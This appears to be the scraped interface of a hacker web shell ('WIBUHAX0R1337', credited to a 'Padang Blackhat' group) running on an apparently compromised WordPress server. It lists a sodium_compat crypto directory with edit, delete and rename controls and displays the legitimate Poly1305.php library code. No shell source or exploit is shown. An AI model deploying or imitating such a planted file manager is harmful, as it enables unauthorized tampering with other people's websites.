-
WIBUHAX0R1337
-
/
home
/
coludnqa
/
public_html
/
wp-includes
/
sodium_compat
/
src
/
Core
/
[ Home ]
Create Folder
Create File
Nama File / Folder
Size
Action
AEGIS
--
NONE
AES
--
NONE
Base64
--
NONE
ChaCha20
--
NONE
Curve25519
--
NONE
Poly1305
--
NONE
SecretStream
--
NONE
.htaccess
0.231KB
Edit File
Delete File
Rename
AEGIS128L.php
3.582KB
Edit File
Delete File
Rename
AEGIS256.php
3.514KB
Edit File
Delete File
Rename
AES.php
15.513KB
Edit File
Delete File
Rename
BLAKE2b.php
23.625KB
Edit File
Delete File
Rename
ChaCha20.php
12.631KB
Edit File
Delete File
Rename
Curve25519.php
139.287KB
Edit File
Delete File
Rename
Ed25519.php
17.074KB
Edit File
Delete File
Rename
HChaCha20.php
3.78KB
Edit File
Delete File
Rename
HSalsa20.php
3.587KB
Edit File
Delete File
Rename
Poly1305.php
1.537KB
Edit File
Delete File
Rename
Ristretto255.php
21.371KB
Edit File
Delete File
Rename
Salsa20.php
8.04KB
Edit File
Delete File
Rename
SipHash.php
8.04KB
Edit File
Delete File
Rename
Util.php
28.245KB
Edit File
Delete File
Rename
X25519.php
9.229KB
Edit File
Delete File
Rename
XChaCha20.php
3.291KB
Edit File
Delete File
Rename
XSalsa20.php
1.339KB
Edit File
Delete File
Rename
error_log
4.944KB
Edit File
Delete File
Rename
<?php if (class_exists('ParagonIE_Sodium_Core_Poly1305', false)) { return; } /** * Class ParagonIE_Sodium_Core_Poly1305 */ abstract class ParagonIE_Sodium_Core_Poly1305 extends ParagonIE_Sodium_Core_Util { const BLOCK_SIZE = 16; /** * @internal You should not use this directly from another application * * @param string $m * @param string $key * @return string * @throws SodiumException * @throws TypeError */ public static function onetimeauth($m, $key) { if (self::strlen($key) < 32) { throw new InvalidArgumentException( 'Key must be 32 bytes long.' ); } $state = new ParagonIE_Sodium_Core_Poly1305_State( self::substr($key, 0, 32) ); return $state ->update($m) ->finish(); } /** * @internal You should not use this directly from another application * * @param string $mac * @param string $m * @param string $key * @return bool * @throws SodiumException * @throws TypeError */ public static function onetimeauth_verify($mac, $m, $key) { if (self::strlen($key) < 32) { throw new InvalidArgumentException( 'Key must be 32 bytes long.' ); } $state = new ParagonIE_Sodium_Core_Poly1305_State( self::substr($key, 0, 32) ); $calc = $state ->update($m) ->finish(); return self::verify_16($calc, $mac); } }
© 2022 - 2023 WIBUHAXOR V1 By Lutfifakee || Padang Blackhat